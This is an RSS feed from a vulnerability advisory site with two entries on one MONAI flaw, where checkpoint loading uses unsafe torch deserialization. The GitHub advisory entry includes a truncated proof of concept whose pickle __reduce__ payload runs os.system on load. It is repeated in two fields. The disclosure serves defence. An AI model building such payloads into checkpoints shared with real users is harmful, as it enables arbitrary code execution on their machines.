<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 23:48:10 +0000</lastBuildDate>
    <item>
      <title>CVE-2025-58756 — MONAI's unsafe torch usage may lead to arbitrary code execution</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2025-58756</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Project-MONAI MONAI&lt;/p&gt;
&lt;p&gt;MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, in `model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)` in monai/bundle/scripts.py , `weights_only=True` is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints. This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from other platforms. Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution. As of time of publication, no known fixed versions are available.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Project-MONAI MONAI&lt;/p&gt;
&lt;p&gt;MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.0, in `model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)` in monai/bundle/scripts.py , `weights_only=True` is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints. This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from other platforms. Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution. As of time of publication, no known fixed versions are available.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2025-58756</guid>
    </item>
    <item>
      <title>GHSA-6vm5-6jv9-rjpj — MONAI: Unsafe torch usage may lead to arbitrary code execution</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-6vm5-6jv9-rjpj</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: monai&lt;/p&gt;
&lt;p&gt;### Summary
In ```model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)``` in monai/bundle/scripts.py , ```weights_only=True``` is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints.&lt;/p&gt;
&lt;p&gt;This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from platforms like huggingface.&lt;/p&gt;
&lt;p&gt;Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution.&lt;/p&gt;
&lt;p&gt;The following proof-of-concept demonstrates the issues that arise when loading insecure checkpoints.&lt;/p&gt;
&lt;p&gt;```&lt;/p&gt;
&lt;p&gt;import os  
import tempfile  
import json  
import torch  
from pathlib import Path  
  
class MaliciousPayload:  
    def __reduce__(self):  
        return (os.system, (&amp;#39;touch /tmp/hacker2.txt&amp;#39;,))  
  
def test_checkpoint_loader_attack():&lt;/p&gt;
&lt;p&gt;temp_dir = Path(tempfile.mkdtemp())  
    checkpoint_file = temp_dir / &amp;#34;malicious_checkpoint.pt&amp;#34;&lt;/p&gt;
&lt;p&gt;malicious_checkpoint = {  
        &amp;#39;model_state_dict&amp;#39;: MaliciousPayload(),  
        &amp;#39;optimizer_state_dict&amp;#39;: {},  
        &amp;#39;epoch&amp;#39;: 100  
    }&lt;/p&gt;
&lt;p&gt;torch.save(malicious_checkpoint, checkpoint_file)  
      
     
    from monai.handlers import CheckpointLoader  
    import torch.nn as nn  
          
 
    model = nn.Linear(10, 1)  
        
    loader = CheckpointLoader(  
        load_path=str(checkpoint_file),  
        load_dict={&amp;#34;model&amp;#34;: mode…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: monai&lt;/p&gt;
&lt;p&gt;### Summary
In ```model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)``` in monai/bundle/scripts.py , ```weights_only=True``` is loaded securely. However, insecure loading methods still exist elsewhere in the project, such as when loading checkpoints.&lt;/p&gt;
&lt;p&gt;This is a common practice when users want to reduce training time and costs by loading pre-trained models downloaded from platforms like huggingface.&lt;/p&gt;
&lt;p&gt;Loading a checkpoint containing malicious content can trigger a deserialization vulnerability, leading to code execution.&lt;/p&gt;
&lt;p&gt;The following proof-of-concept demonstrates the issues that arise when loading insecure checkpoints.&lt;/p&gt;
&lt;p&gt;```&lt;/p&gt;
&lt;p&gt;import os  
import tempfile  
import json  
import torch  
from pathlib import Path  
  
class MaliciousPayload:  
    def __reduce__(self):  
        return (os.system, (&amp;#39;touch /tmp/hacker2.txt&amp;#39;,))  
  
def test_checkpoint_loader_attack():&lt;/p&gt;
&lt;p&gt;temp_dir = Path(tempfile.mkdtemp())  
    checkpoint_file = temp_dir / &amp;#34;malicious_checkpoint.pt&amp;#34;&lt;/p&gt;
&lt;p&gt;malicious_checkpoint = {  
        &amp;#39;model_state_dict&amp;#39;: MaliciousPayload(),  
        &amp;#39;optimizer_state_dict&amp;#39;: {},  
        &amp;#39;epoch&amp;#39;: 100  
    }&lt;/p&gt;
&lt;p&gt;torch.save(malicious_checkpoint, checkpoint_file)  
      
     
    from monai.handlers import CheckpointLoader  
    import torch.nn as nn  
          
 
    model = nn.Linear(10, 1)  
        
    loader = CheckpointLoader(  
        load_path=str(checkpoint_file),  
        load_dict={&amp;#34;model&amp;#34;: mode…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-6vm5-6jv9-rjpj</guid>
    </item>
  </channel>
</rss>
